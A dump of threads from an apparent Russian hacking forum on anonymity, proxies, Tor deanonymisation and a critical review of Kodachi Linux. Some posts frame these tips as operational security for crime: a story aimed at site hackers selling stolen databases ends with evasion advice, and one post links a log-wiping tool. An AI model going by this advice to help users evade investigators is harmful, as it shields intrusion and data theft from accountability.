Замечание: если в браузере установлены расширения, которые управляют выбором прокси-сервера (VPN-расширения, Switchy Omega), то включение ShadowSocks через System Proxy - Global не будет иметь никакого эффекта на браузер. Нужно их либо выключить, либо перенастроить на системный прокси, если есть такая возможность.

Ограничения Heroku

Для приложений, запущенных на Heroku, в настоящий момент действуют следующие ограничения:

Временная квота работы приложений при бесплатном уровне использования составляет 550 часов в месяц.

Контейнер приложения переходит в спящий режим после 30 минут отсутствия запросов к нему. С одной стороны это доставляет неудобства в виде задержек ответа до полминуты после перерыва в активности. С другой стороны, это экономит отведённую временную квоту.

Квота на передачу данных по сети равна 2 ТБ в месяц. То есть в случае с прокси это даёт чуть меньше 1 ТБ трафика в месяц.

Автор YourChief
источник habr

Посоветуйте хорошую сборку против деанонимизации и в целях безопасности

ID: 676533bbb4103b69df3719d4
Thread ID: 103876
Created: 2023-12-11T10:08:24+0000
Last Post: 2023-12-13T19:06:23+0000
Author: Onyx450
Replies: 12 Views: 791

Здравствуйте, интересует хорошая сборка для защиты себя а именно от даенонимазци и в целях собственой безопасности при атаках и взломах компьютерных сетей или как это щас называется на новоязе при пинтестеге сетей,одно точно знаю что со своего компьютера проводить подобные атаки это гибель нужно использовать vps-удаленый сервер,нооо опыта мало и по этому хочу узнать от более опытных людей какие хорошие сборки а точнее комбинанци например vps +vpn+proxy и т.д в этом направлении какие актуальны?

Палево Vpn (литературное произведение) - сразу предупреждаю, статья 2007 года. Но интересная ведь и заставляет задуматься.

ID: 676533bbb4103b69df371ac0
Thread ID: 72224
Created: 2022-08-25T09:07:12+0000
Last Post: 2022-09-04T16:20:56+0000
Author: Pulp Fiction
Replies: 28 Views: 789

Каждый разумный человек занимающийся незаконным видом деятельности в сети подумывает о своей безопасности,кто то сидит под цепочкой носков,кто то умеет ставить squard на далеких хостах,другой юзает тунелирование и того и другого,но в последнее время возникло мнение будто опен впн спасает от всех напастей и его можно юзать голым реальным айпишником не переживая о том что тебя смогут вычислить,базара нет - % нахождения человека сидящего под OVPN в момент совершения мутного дельца падает с каждым днем ,и если по горячим следам не напали на след то уже х#й унюхают,но вероятность вычисления реал.айпи всегда будет оставаться выше нуля.
Например: парень по имени Вася сидит под впном который он юзает третий месяц под одним и тем же логином ,а по ночам ломает сайты,делает заливы вобщем ведет криминальный вид активности,в один прекраный день он смог пиздануть базу одного шикарного амерского шопа и продал ее за хорошие мани,и вот он сидит и нихуя не сечет что же тем временем происходит в буржуйском государстве,а там происходит следующая движуха:
ФБР:админ шопа жалуется хозяину шопа о том что какой то умелец хакнул ихнюю систему безопасности и слил себе важные данные которые в случае попадания в руки конкурентов приведут шоп в состояние начинания,хозяин дает пизды админу и напрягает его вычислить подлеца,а сам валит в фбр и пишет заяву,тем временем погоны подтягивают админа и вопрошают его :"а че вобще нету никакого следа этого хацкера?" админ волнуясь отвечает:" да есть айпишник ,а хули толку то?"
ФБР: всмысле хули толку?
АДМИН: да не реально найти кого либо по этому айпи
ФБР: твое дело маленькое,давай сюда этот номер и сиди не дергайся,если ты тут замешан мы тебя выебем,блядь заебали уже эти хакеры,всю кровь попили сцуки.
Далее погоны идут с этим номерком в ихнее бюро и узнают что под этим номерком сидит 5000 человек в штате Аризона,там погоны пробивают что это за пров и едут в ихний офис ебать мозги:
ФБР:здраствуйте мы погоны и хотим у вас узнать кто в эту среду в 9.15-9.17 утра от вас подрубался к вот этому адресу и протягивают номер хоста шопа
АДМИН: пять сек,и вытаскивает из огромной базы один внутренний айпишник который именно выходил в коннект с этим шопом,дает адресок и по нему уезжают бравые ребята.

тук тук
ктотама?
ФБР:это мы бравые ребята из фбр
бабка:аа,заходите пожалуйста,я как раз блинчики допекаю будете чай пить?
ФБР:да нет МЭМ мы по делу,а вы давно в инете шаритесь? - спрашивают они у 75 летней бабки
бабка:да нет вот только пол года дед компутер купил ,чтоб товары заказывать из магазина,ведь старость не в радость бегать по улице за хлебом,а тут щелк щелк и все ,и нам не сложно и дешевле.
ФБР:ясн
а компутер ваш где стоит?
бабка:да вот же он
ФБР:аа,ок.мы его заберем на пару дней и показывают бумажечку
о.к.,ребят как вам будет угодно,а что произошло то?
ФБР:да нет ничего просто профилактические меры по выявлению левого програмного обеспечения
забирают комп в свое бюро,там через пятнадцать минут видят сокс через пять минут видят айпи который вылезал через сокс в эту среду в 9.15-9.17 утра и выдают айпи бравым молодцам.
те вопрошают а что это? а это впн сервер едьте туда вам объяснят и дают адрес прова у которого хостится впн,парни отвечат :"да вы че охуели что ли? это же африка"
SAPS:алее
ФБР:хелло!коллеги у нас тут такое дело,поможете?
SAPS:поможем но с вас награда
ФБР: да о чем раговор!
SAPS:давайте айпи
ФБР: нате
SAPS:ждите

SAPS:здраствуйте, кто у вас выходил на ...... этот айпи в среду рано утром в 2:15
АдМИН: вот этот мэн,его адрес ....

SAPS: Добрый день,а у вас тут что такое? а это у нас датацентр свой ,а кто через ваш датацентр вылазил в 2:15 утра на такой то айпи,
Админ:а вот х#й его знает ведь нашь сервант логов не ведет
SAPS:вы че блядь охуели,вот вам распорядок,что бы стояли харды на 300 гигов и чтоб писали все и вся ,если что мы вас выебем и высушим,поняли?
Админ:ок попробуем разобраться:
итак вот этот айпи подрубался к нам в 2:15 в среду,а вот к этому айпи коннектились во столько же,следует что этот же айпи и коннектился.
SAPS:а кто это?
Админ:а это кто то из северных краев далекой россии
SAPS:Лана ок,но ты смотри больше чтоб не была такой х#йни
Админ:виноват ,исправим (и ставит на впн сквозняковы прокс ведущий подробные логи,ну их нгахуй этих хацкеров)

=============
SAPS:Алее
ФБР:хелооу?
SAPS:вопщем нате и с вас обещанная награда
ФБР:будет вам награда
SAPS:О.К.

берут айпишник и несут его в бюро находок,тьам смотрят и говорят точный район раши матушки.
ФСБ:ало
ФБР:хеллоу,коллеги у нас тут такая х#йня опять с вашими детями,поможете?
ФСБ:С вас награда и поляна
ФБР:ноу проблемс

тук тук
КТО?
ФСБ:это мы бравая команда КВН
ВАСИНА МАМА:что такое случилось с моим сыном?
ФСБ:а где ВАСЯ?
МАТЬ: а он на учебе в институте
ФСБ:а когда он придет?
МАТЬ:а вот же он пришел
ФСБ:аа!вот он и ВАСИЛИЙ!скажи ка нам василий а где твой компьютер?
МАТЬ:а что случилось?
ФСБ:извините женщина вашему сыну скока лет?
МАТЬ: 20
ФСБ:ну так значит он может быть отпизжен на допросе без вашего надзора
МАТЬ: а что же случилось?
ФСБ: ВАСЯ покажи нам свой компьютер
ВАЯС?да хз куда оне запропастился,был где то здесь
ФСБ:Вася обманывать погоны нехорошо и достают ноут из под подушки
ВАся:да я ни в чем не виноват
Погоны:кто вылазил в инет из за этого кабеля в 11 утра в среду?
ВАЯС:да я вот от другана принес программу какуюто запустил ее и комп завис,а перезагрузить его я побоялся думал вдруг поломается.так и ждал до вечера
ФСБ:мальчик нам пох кто и что,мы его забираем,а тебе завтра рано сюда явиться и дают ему повестку.
ФСЕ ПРИПЛЫЛИ
А там хоть есть логи хоть что ,один х#й палево неожиданное

отсюда вывод : если юзать то только тот овпн на котором сидит куча народу а не десять,15 человек за сутки

(c.) ALERTON Mar 7 2007

911 bb или о печальном

ID: 676533bbb4103b69df371ab8
Thread ID: 70820
Created: 2022-07-29T08:59:18+0000
Last Post: 2022-09-20T02:31:02+0000
Author: achobem
Replies: 9 Views: 789

Прокси-сервис 911.re закрывается навсегда из-за многочисленных хакерских атак, взлома и потери данных сайта. Ниже прикладываю небольшой список альтернатив.

spaceproxy.net / fineproxy.org
faceless.cc / webshare.io
aceproxies.com / luminati.io
brightdata.com / flipnode.io
changemyip.com / geosurf.com
cosmoproxy.com / proxyside.io
dslrentals.com / nonymous.io
proxy-seller.com / ipburger.com
highproxies.com / proxyips.net
hydraproxy.com / proxyworld.io
rotatingproxies.com / rsocks.net
privateproxy.me / proxyempire.io
pingproxies.com / v6proxies.com
proxytales.com / proxyguys.com
superproxy.shop / proxyverse.io

Mac M1 + Варя (VMware) с Вин11 (Windows 11), утечка ДНС

ID: 676533bbb4103b69df371a84
Thread ID: 75899
Created: 2022-11-14T21:29:51+0000
Last Post: 2023-02-20T18:30:44+0000
Author: Patrick
Replies: 7 Views: 784

Всем привет!
Быть может кто-то сталкивался со следующей проблемой и ему удалось ее решить. Буду признателен за помощь/подсказку.
Суть: Mac с М1, на нем VMware Fusion Public Tech Preview 22H2 с Win11. При коннекте к ВПН внутри вари, проскакивает ДНС с хоста.
Как победить?

Анонимная Операционная система (Openwrt, Tiny Core)

ID: 676533bbb4103b69df3718ef
Thread ID: 128179
Created: 2024-12-03T20:47:44+0000
Last Post: 2024-12-10T20:05:16+0000
Author: NWA_USE
Replies: 11 Views: 784

Насколько безопасной будет OC на пк Openwrt или tiny core , freedos где есть только то что нужно тебе. Какие атаки на эти OC возможны ? Что думаете на счет сборки типа : Hardened gentoo -> hardenedbsd -> Openwrt ,tiny core или freedos. будут ли на эти ОС меньше эксплоитов ? какие плюсы и минусы? будут ли эти OC (Openwrt или tiny core , freedos) безопаснее whonix , tails ?

Эти OC очень маленькие и к ним не должны быть уязвимости в отличии от огромных дистребутивов.

Если я не прав Буду рад если кто-то технически и детально объяснит почему я не прав.

Что думаете на счет браузера lynx , приватнее ли он чем tor или firefox

Спасибо

Proxyfair + FirefoxPortable

ID: 676533bbb4103b69df371b88
Thread ID: 44990
Created: 2020-11-30T17:54:06+0000
Last Post: 2021-10-28T19:36:36+0000
Author: sanyasnus
Replies: 5 Views: 782

Подскажет кто как настроить, настраиваю Proxy Rules, мазила не запускается

site.onion.ly - деаноним или что за ly на конце?

ID: 676533bbb4103b69df371b84
Thread ID: 57818
Created: 2021-10-17T12:09:46+0000
Last Post: 2021-11-07T13:00:02+0000
Author: Dexter DeShawn
Replies: 16 Views: 782

Приветствую мемберы!
Давно уже знаю про приставку ly на конце торовских сайтов. Если дописать её с точкой после onion, то можем заходить на тор-сайты с обычных браузеров.
Недавно решил проверить несколько тор-адресов с данной приставкой на таких ресурсах, как 2ip.ru, check-host.net, whoer.net. Результат мне показывает IP- адреса этих сайтов и у всех они одинаковые, а местонахождение серверов - это Люксенбург и штаты, а хостер FranTech Solutions.
Дак что же это получается, что можно легко определить где находится сервак тор-сайта?

Примеры для этого форума и небезизвестной гидры:

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion.ly

Darknet TOR / I2P Proxy and Gateway

Tor / I2P in proxy and gateway. Just like tor2web, access .onion and .i2p domains without running Tor or I2P software.

hydraruzxpnew4af.onion.ly

Поделитесь знаниями и мнением:
Что же это за приставка ly?
Почему приставка ly даёт доступ к тор-сайтам из обычных браузеров?
И почему у всех IP одинаковые?

EventCleaner | Git

ID: 676533bbb4103b69df371cc7
Thread ID: 38927
Created: 2020-06-27T07:33:52+0000
Last Post: 2020-06-27T07:33:52+0000
Author: Kokoloko
Replies: 0 Views: 778

someone famillier with this one and can comment if it works good or not?
link: https://github.com/QAX-A-Team/EventCleaner

Изменение голоса на женский

ID: 676533bbb4103b69df37191a
Thread ID: 71665
Created: 2022-08-14T15:48:49+0000
Last Post: 2024-10-16T01:32:51+0000
Author: kommercheskiy
Replies: 6 Views: 775

Доброго времени суток, Уважаемые форумчане!
Есть нужда в изменении голоса на женский с помошью каких-либо специализированных программ на Десктоп, либо Андроид (.apk). Может быть есть такие боты в Telegram?
Возможно кто-то знает такие?
Буду безмерно благодарен!

С Уважением, Kommercheskiy

Анонимность Tor поставлена под угрозу правоохранительными органами. Можно ли по-прежнему пользоваться им? (статья Malwarebytes)

ID: 676533bbb4103b69df37192c
Thread ID: 123301
Created: 2024-09-22T22:42:50+0000
Last Post: 2024-09-22T23:58:15+0000
Author: r_as
Replies: 2 Views: 775

Несмотря на то что люди в целом считают сеть Tor незаменимым инструментом для анонимного просмотра сайтов, немецким правоохранительным органам удалось деанонимизировать пользователей Tor после того, как они в течение нескольких месяцев вели наблюдение за серверами Tor.

Прежде чем мы перейдем к рассмотрению того, что сделали правоохранительные органы, давайте взглянем на некоторые основы Tor.

Как работает Tor

Ежедневно миллионы людей используют сеть Tor для приватного просмотра и посещения сайтов в dark web. Tor повышает уровень конфиденциальности, направляя интернет-трафик через минимум три случайно выбранных маршрутизатора, или узла. В ходе этого процесса пользовательские данные шифруются, прежде чем они достигнут места назначения через конечный узел, что гарантирует конфиденциальность и безопасность действий пользователя и его IP-адреса.

Вот более подробный обзор того, как работает этот механизм:
- Entry node : Когда вы начинаете работать с Tor, ваше соединение сначала направляется на входной узел, также известный как узел охраны. Именно здесь ваш интернет-трафик попадает в сеть Tor, а ваш IP-адрес виден только этому узлу.
- Middle nodes : После входа в сеть Tor ваш трафик проходит через один или несколько средних узлов. Эти узлы выбираются случайным образом, и каждый из них знает только IP-адрес предыдущего и следующего ретранслятора. Таким образом, ни один ретранслятор не может знать полный путь вашей интернет- активности.
- Exit node : Последний ретранслятор в цепочке является выходным узлом. Он расшифровывает информацию, полученную от средних ретрансляторов, и отправляет ее по назначению. Важно отметить, что выходной узел снимает все слои шифрования для связи с целевым сервером, но не знает о происхождении трафика, гарантируя, что ваш IP-адрес останется скрытым.

Эта многоуровневая модель безопасности, похожая на очистку лука, и послужила основой для названия Tor. Tor - это аббревиатура от The Onion Router. Каждый слой гарантирует, что ни один из узлов на пути не знает, откуда пришел трафик и куда он направляется, что значительно повышает анонимность пользователя и делает крайне сложным для кого-либо отслеживание полного пути данных.

Хотя многие исследователи теоретически считали, что деанонимизация возможна, в целом она считалась практически неосуществимой, если пользователь соблюдал все необходимые меры безопасности.
**
Как происходила деанонимизация?**

Немецкое новостное [издание NDR сообщает](https://www.ndr.de/fernsehen/sendungen/panorama/aktuell/Investigations- in-the-so-called-darknet-Law-enforcement-agencies-undermine-Tor- anonymisation,toreng100.html), что правоохранительные органы получили данные при слежке за серверами, которые были обработаны таким образом, что полностью отменили анонимность Tor. Журналисты увидели документы, свидетельствующие о четырех успешных мерах в рамках одного расследования.

После публикации на Reddit и двух лет расследования журналисты пришли к выводу, что пользователей Tor можно деанонимизировать, соотнеся временные характеристики сетевого трафика, входящего и выходящего из сети Tor, в сочетании с широким и долгосрочным мониторингом узлов Tor в дата-центрах.

Если вы можете отслеживать трафик как на входе, так и на выходе из сети Tor, вы сможете соотнести время получения реального IP-адреса пользователя с местом назначения его трафика. Для этого, как правило, необходимо контролировать или наблюдать как за exit node, так и за entry node, используемым в цепи Tor. Однако это не работает при подключении к луковым сайтам, поскольку в этом случае трафик никогда не покинет сеть Tor.

Временной анализ использует размер пакетов данных, которыми обмениваются, чтобы связать их с пользователем. Можно представить, что, имея доступ к промежуточному узлу, вы можете привязать входящие и исходящие пакеты данных к одному пользователю. Хотя это не раскрывает содержание сообщений, это может помочь установить, кто с кем общается.

Tor по-прежнему безопасен, утверждает создатели самого Tor

Проблема, с которой сталкивается Tor, заключается в том, что он был разработан с учетом сотен тысяч различных узлов по всему миру. В реальности существует около 7-8 тысяч активных узлов, и многие из них находятся в центрах обработки данных. Как следствие, «минимум три» часто означает «всего три», что повышает потенциальную эффективность атак по времени.

Проект Tor [заявил](https://lists.torproject.org/pipermail/tor- relays/2024-September/021855.html):

«Проект Tor не получил доступа к подтверждающим документам и не смог независимо проверить, является ли это утверждение правдой, имела ли место атака, как она была проведена и кто в ней участвовал».

Click to expand...

Основываясь на предоставленной информации, Tor Project пришел к выводу, что один из пользователей давно вышедшего из употребления приложения Ricochet был деанонимизирован в результате атаки именуемой guard discovery attack. На тот момент это было возможно, поскольку пользователь использовал версию программы, в которой не было ни Vanguards-lite, ни Vanguards add on, которые были введены для защиты пользователей от такого типа атак.

А значит, они могут с уверенностью утверждать, что Tor по-прежнему безопасен для использования. Однако мы хотели бы добавить, что пользователи должны знать, что некоторые правоохранительные органы и киберпреступники управляют узлами Tor, что может представлять опасность.
_
Если вы используете Tor, вот несколько основных правил, которые помогут вам оставаться максимально анонимными:

- Всегда загружайте Tor Browser с официального сайта проекта Tor.
- Обновляйте Tor Browser до последней версии, чтобы получить исправления безопасности.
- Используйте настройки Tor Browser по умолчанию - не устанавливайте дополнения и не меняйте настройки, если вы не знаете, что делаете и каковы последствия.
- Включите уровень безопасности «Самый безопасный» в настройках Tor Browser.
- Посещайте только зашифрованные по протоколу HTTPS веб-сайты.
- Не входите в личные аккаунты и не вводите личную информацию. Если вы разместите где-нибудь свои личные данные, это подорвет всю идею сохранения анонимности.
- Будьте крайне осторожны при загрузке файлов или переходе по ссылкам, тем более в dark web.
- Отключите JavaScript, если это возможно, хотя это может нарушить работу некоторых сайтов.
- Очищайте cookies и локальные данные сайтов после каждого сеанса просмотра.
- Используйте надежный VPN в дополнение к Tor для дополнительного уровня шифрования.
- Установите на своем устройстве актуальное антивирусное/антивирусное программное обеспечение._

источник: [https://www.malwarebytes.com/blog/n...ed-by-law-enforcement-is-it- still-safe-to-use](https://www.malwarebytes.com/blog/news/2024/09/tor- anonymity-compromised-by-law-enforcement-is-it-still-safe-to-use)

Depix - восстановление "заблуренного" текста в изображении

ID: 676533bbb4103b69df371c6d
Thread ID: 45366
Created: 2020-12-09T17:22:48+0000
Last Post: 2020-12-09T17:22:48+0000
Author: tabac
Replies: 0 Views: 773

Голландский рисёрчер Сипке Меллема выложил на Github тулзу под названием Depix, которая позволяет восстановить текст на графическом изображении, заблуренный линейным фильтром (наиболее распространённый метод в редакторах). Судя по [описанию](https://xss.is/tg%3A//unsafe_url?url=https%3A%2F%2Fwww.linkedin.com%2Fpulse%2Frecovering- passwords-from-pixelized-screenshots-sipke-mellema%2F) и отзывам пользователей эффективность восстановления достаточно высокая. Если кто-то ещё не выкорчевал графическую обфускацию из своих опсек-практик, то настало время.

Прглашения на cock.li

ID: 676533bbb4103b69df371bd1
Thread ID: 54428
Created: 2021-07-26T09:33:12+0000
Last Post: 2021-07-28T07:53:30+0000
Author: gloritown
Replies: 11 Views: 770

Здравствуйте,
у кого нибудь случайно ещё не осталось одно приглашение? Я пользовался всю жизнь protonmail.com но после последних новостей сомневаюсь в их безопасности. Лучше быть осторожным чем пойманом

Tor + i2p или i2p + tor?

ID: 676533bbb4103b69df371bba
Thread ID: 55770
Created: 2021-08-24T09:58:12+0000
Last Post: 2021-08-25T08:24:38+0000
Author: Linuz
Replies: 11 Views: 770

Знаю, тема заезженная, но все же: какую связку лучше использовать (при достаточной скорости интернета) Tor + i2p или i2p + Tor?

Облачный телефон

ID: 676533bbb4103b69df371962
Thread ID: 115590
Created: 2024-05-29T03:45:26+0000
Last Post: 2024-05-29T18:45:10+0000
Author: Codla
Replies: 3 Views: 769

Как можно реализовать смартфон в облаке? Чтобы это работало так - на физическом смартфоне, нр Андроиде, стоит приложение - допустим рдп, по нему подключаешься к удалённому серверу и у тебя там полноценный такой же андроид)
Это реализуемо только - аренда впс, на впс эмулятор? Или есть другие варианты?
И если через эмулятор, то насколько это юзабельно будет в плане скорости и функционала?

Windows 11 Security Book: Powerful Security from Chip to Cloud

ID: 676533bbb4103b69df371b99
Thread ID: 57475
Created: 2021-10-07T14:37:15+0000
Last Post: 2021-10-07T14:37:15+0000
Author: Grotendique
Prefix: Мануал/Книга
Replies: 0 Views: 765

- Introduction
- Hardware Security
- Operation System Security
- Application Security
- Identity and Privacy
- Cloud Services
- Security Foundation
- Conclusion

DOWNLOAD

Утечка ДНС в виртуальной машине

ID: 676533bbb4103b69df371c5e
Thread ID: 46569
Created: 2021-01-11T09:59:08+0000
Last Post: 2021-01-11T10:10:40+0000
Author: pcng
Replies: 1 Views: 765

Здравствуйте.
Пожалуйста, помогите разобраться.
Мне необходимо пустить траффик виртуальной машины и эмулятора нокс через проксик.
Я использую связку 911+проксифайер
При этом подходе на виртуалке отображается ДНС моей хостовой машины.
Как исправить данную проблему?
Мне необходимо, чтобы на виртуалке был ДНС моего прокси.
Сделал небольшое видео для наглядности:

Kill switch Wireguard

ID: 676533bbb4103b69df371966
Thread ID: 108072
Created: 2024-02-12T10:27:11+0000
Last Post: 2024-05-25T18:35:44+0000
Author: nda
Replies: 5 Views: 764

Подскажите, с помощью каких настроек Iptables весь Internet трафик, любые входящие/исходящие соединения будут возможны только с подключенным Wireguard.

Анонимный способ перевести рубли в биткоин

ID: 676533bbb4103b69df371c8f
Thread ID: 43233
Created: 2020-10-15T14:45:48+0000
Last Post: 2020-10-15T16:25:56+0000
Author: tipokipocod
Replies: 1 Views: 763

Без учета черной деятельности. Лишь просто анонимное пополнение.

Kodachi Linux, вероятно, небезопасен

ID: 676533bbb4103b69df3719fe
Thread ID: 99247
Created: 2023-10-02T12:37:43+0000
Last Post: 2023-10-10T04:51:21+0000
Author: IvanVasilyevich
Prefix: Статья
Replies: 15 Views: 763

Оригинал**:****

Kodachi Linux: A brief Security Review – /dev/urandom

**

Недавно я познакомился с дистрибутивом Kodachi Linux, который, судя по его сайту, получил признание критиков. Это поверхностный взгляд на дистрибутив, если его вообще можно так назвать. С самого начала все начинается не очень хорошо:

Запутанная документация

Для достижения наилучших результатов в области безопасности (электронная почта - банковские услуги - криптовалюта):

Провайдер > Хост-машина (Анонимный VPN за XMR) > Kodachi VPN (Виртуальная машина - Vmware) с принудительным брандмауэром > Браузер Kodachi > Dnscrypt (Лучшая модель)

Провайдер > Kodachi VPN с принудительным брандмауэром > Браузер (loaded) Kodachi > Dnscrypt

Провайдер > Kodachi VPN с принудительным брандмауэром > Браузер (loaded) Kodachi > TOR DNS

Провайдер > Kodachi VPN с принудительным брандмауэром > Браузер (lite) Kodachi > TOR DNS (Быстрая модель)

Провайдер > Kodachi VPN с принудительным брандмауэром > Тор-Браузер > Dnscrypt

Провайдер > Kodachi VPN с принудительным брандмауэром > Тор-Браузер > TOR DNS

Click to expand...

Это приводит к смешиванию понятий безопасности и анонимности. Хотя большинство сайтов сегодня используют протокол TLS (https), отправка трафика через неизвестные VPN и Tor может привести к тому, что ваш трафик попадет к злоумышленникам. Вы не можете знать о мотивах людей, управляющих ретрансляторами выхода из Tor, и хотя они могут обеспечивать анонимность, они не предназначены для обеспечения безопасности.

Более того, Warith Al Maawali, автор Kodachi, открыто признает, что по умолчанию при загрузке передается аппаратный хэш:

Я плачу ежемесячную арендную плату за узлы VPS и использую их для работы VPN, который предоставляется вам, я не собираю НИКАКИХ данных и не храню НИКАКОЙ информации (Logs), принадлежащей пользователю, кроме идентификатора оборудования (hash) и подключенного IP адреса (VPN IP), который должен быть отправлен автоматически, когда ваш компьютер устанавливает соединение с VPN.

Click to expand...

Как, черт возьми, он пришел к выводу, что передача аппаратного хэша при загрузке является хорошей идеей для дистрибутива, ориентированного на безопасность и анонимность? Я мог бы согласиться с этим, если бы это происходило только после того, как пользователь решил использовать этот VPN. А так он автоматически передает его при загрузке.

Что такое Kodachi

Kodachi это не то, что я бы назвал дистрибутивом. Стандартные репозитории Ubuntu. Это просто Ubuntu с темой оформления и некоторыми shell скриптами для управления дополнительными функциями безопасности. На мой взгляд, это должно быть более заметно, особенно учитывая несколько сомнительную лицензию, которую он публикует. Его код это не ОС; это несколько shell скриптов.

Сетевая катастрофа

IPv4, Kodachi, по крайней мере, удается правильно настроить. tracepath -4 vg.no указывает, что да, он действительно проходит через VPN и, возможно, Tor:

Но для IPv6 он ломается! IPv6 включен и функционирует. Обратите внимание, что я отредактировал первые два хопа, поскольку они находятся внутри моей собственной сети но третий хоп является конечной точкой Hurricane Electric для моего IPv6 туннеля...

Это катастрофический недостаток дистрибутива, пытающегося обеспечить анонимность! Незнающие пользователи могут быть банально отслежены по IPv6, полагая, что система использует те VPN, которые они ей указали. Некоторые пакеты, входящие в состав дистрибутива, такие как youtube-dl, с удовольствием используют IPv6 там, где это возможно.

Хотя я обычно горячо поддерживаю IPv6, на данный момент, вероятно, имеет смысл полностью [отключить его](https://askubuntu.com/questions/1046057/disabling- ipv6-in-ubuntu-server-18-04), если ваша цель анонимность. В данном сценарии это риск, поскольку инструменты, работающие на IPv4, часто не знают об IPv6.

Кроме того, похоже, что он путает dnscrypt и VPN. На рабочем столе показано ISP->VPN->DNScrypt - что... непонятно. DNSCrypt предназначен для обеспечения поиска DNS, а не сетевого трафика в целом!

Установленное программное обеспечение

Этот раздел можно охарактеризовать как "все, включая кухонную раковину". В него входят:

Audacity

Remmina

LibreOffice

OpenSSH server

GCC

Postfix (который включен и даже слушает!)

И многое, многое другое.

Возможно, это связано с тем, что это Live-образ Ubuntu с минимальными изменениями. Но большее количество программного обеспечения означает большую площадь атаки. А это, вероятно, не очень хорошо для системы, ориентированной на сохранение анонимности. Такие программы, как [popularity- contest](https://askubuntu.com/questions/57808/what-is-the-popularity-contest- package-for), установлены, хотя и отключены. Нет никакой разумной причины для установки этого!

Даже avahi установлен. Зачем вообще нужна программа, предназначенная для объявления о своем присутствии в такой системе? Это просто не имеет смысла. Его удаление позволит системе работать нормально и устранит одну потенциальную проблему.

Это общая проблема здесь; все установлено и доступно. Это позволяет пользователю совершать ошибки, не осознавая их. Ограничение таких возможностей снижает вероятность ошибок и уменьшает площадь атаки.

Шифрование файлов

Шифрование файлов обеспечивается пользовательским скриптом Python 2.x с именем lock.py и оберткой для shell скрипта с именем lock. lock.py, судя по всему, является скриптом Python, написанным Joe Linoff, хотя создатель Kodachi не дает никаких ссылок на использование этой программы, равно как и на то, что он не является ее создателем. Насколько мне удалось выяснить, скрипт выпущен под лицензией MIT. Насколько я могу судить, Warith Al Maawali, создатель Kodachi, не включает эту лицензию тем самым нарушая условия распространения lock.py.

Вероятно, именно поэтому в своем журнале изменений он пишет следующее:

Я пытался перейти на Ubuntu 20.04, но из-за устаревания Python мне было сложно продолжать, поэтому я продолжил работу с 18.04.6, пока не забывая, что поддержка 18.04 все еще действительна для Ubuntu и ее поддержка должна прекратиться к апрелю 2023 года.

Click to expand...

Кстати, этот журнал изменений стоит прочитать. Он содержит несколько WTF.

Скрипты bash

Программное обеспечение, которым, собственно, и является Kodachi, представляет собой набор bash скриптов в каталоге ~/.kbase/. Качество этих скриптов заставляет меня задуматься. Некоторые скрипты содержат руководство по bash в верхней части:

Покажу фрагмент, который генерирует аппаратный хэш:

Bash:Copy to clipboard

function getID() { a=$(sudo dmidecode -s system-uuid); b=$(sudo dmidecode -s system-serial-number); c=$(sudo dmidecode |grep -w ID:|head -n1); d=$a.$b.$c; f=$(md5sum <<<$d| tr -d -|tr -d ' '); g=$(echo $f | cut -d ' ' -f 1); e=$g; writeToJason "$e" "kodachihwid"; }

Во-первых, это непростительно. Это данные, которые однозначно идентифицируют компьютер, и он их передает. Если компьютер используется для обеспечения анонимности, то этот хэш позволяет любому лицу, контролирующему конечную точку, проверить, соответствует ли пользователь физическому компьютеру. И Al Maawali передает это на свой собственный сервер! Держитесь подальше от Kodachi, он подходит разве что в качестве упражнения, как не нужно делать!

Во-вторых, этот фрагмент свидетельствует о том, что человек не совсем понимает, что делает, с такими конструкциями, как g=[...], за которыми без видимой причины следует e=$g. Плохое именование переменных повышает вероятность ошибок и снижает читабельность, что очень важно для программ, связанных с безопасностью.

Но обратная сторона заключается еще и в том, что эта функция не делает того, что, по мнению автора, она должна делать; можно просто отредактировать скрипт и заменить эту функцию на следующую, которая будет каждый раз возвращать случайный уникальный хэш, тем самым лишая его возможности блокировать людей:

Bash:Copy to clipboard

function getID() { writeToJason echo "$(head -n 1 /dev/urandom | md5sum | cut -d " " -f 1)" "kodachiwid" }

Это еще лучше. Давайте посмотрим, как он работает с сетями:

Bash:Copy to clipboard

IP=$(cat $Jason_web_file_name| jq -r '.ServerFeed6[].Netcheckdomain1'|xargs); # Validate jsons here if [[ ! -n "$IP" ]] then netIP="mail.com"; print_error "Failed to get json variable IP setting it to: $IP"; fi echo "Switching domain to $IP"; echo "Dhcclient the smart way"; for i in $( nmcli device status | awk '{print $1}' ); do if [[ $i != "DEVICE" ]] then echo "Dhcp for:$i"; sudo timeout 60 sudo dhclient $i; fi done fi

Во-первых, выводимые сообщения не имеют смысла. Переключение домена на $IP? И нет, dhclient не разумный способ. Система использует NetworkManager. Он игнорирует его и запускает dhclient напрямую. Кроме того, он запускает его для каждого интерфейса. Включая lo, интерфейс обратной связи. И на всякий случай он использует sudo timeout 60 sudo[...]? Почему двойное sudo?

На самом деле это приводит меня к факту, что в этом дистрибутиве включен беспарольный sudo. Зачем? На мой взгляд, это снижает безопасность. Конечно, это удобнее, но в дистрибутиве, ориентированном на безопасность и конфиденциальность, автор не должен делать такой выбор за пользователя - и автор не должен ставить систему в зависимость от беспарольного sudo.

Кроме того, наблюдается откровенное злоупотребление sudo там, где он явно не нужен. Есть такие строки, как VPN_IP=$(sudo curl -s -m 30 $randomdomain ), где sudo не служит никакой цели. Может быть автор просто привык ставить sudo перед командами, чтобы убедиться, что они работают, не понимая, что делает sudo...?

Функция бана...

Таким образом, он может запретить пользователям использовать его VPN, если посчитает их нежелательными. Как он это делает? Наверняка на стороне сервера, верно?

Неа. Просто шутка! Это делается на стороне клиента.

Bash:Copy to clipboard

function banAction() { SERVICE='openvpn'; if (ps ax | grep -v grep | grep $SERVICE > /dev/null) then sudo killall -SIGINT openvpn; fi SERVICE='tor-service'; if (ps ax | grep -v grep | grep $SERVICE > /dev/null) then sudo killall tor; fi

Итак... он посылает HWID на сервер, и если сервер отвечает banned, клиент обрывает все VPN соединения. Но это же bash скрипт, не так уж сложно закомментировать несколько строк там и здесь.

Это иллюстрация уровня несовершенства мышления Al Maalawi в области безопасности - он не понимает, что в таком сценарии нельзя доверять клиенту. Стали бы вы всерьез доверять этому человеку свою безопасность?

Полное отсутствие брандмауэра!

Одна из самых больших проблем заключается в том, что брандмауэр не настроен. Ничего, ничего, ничего... Но, черт возьми, у него установлен postfix и он слушает!

Bash:Copy to clipboard

$ nc 10.0.3.153 25 220 Live-OS.localdomain ESMTP Postfix (Ubuntu) 500 5.5.2 Error: bad syntax

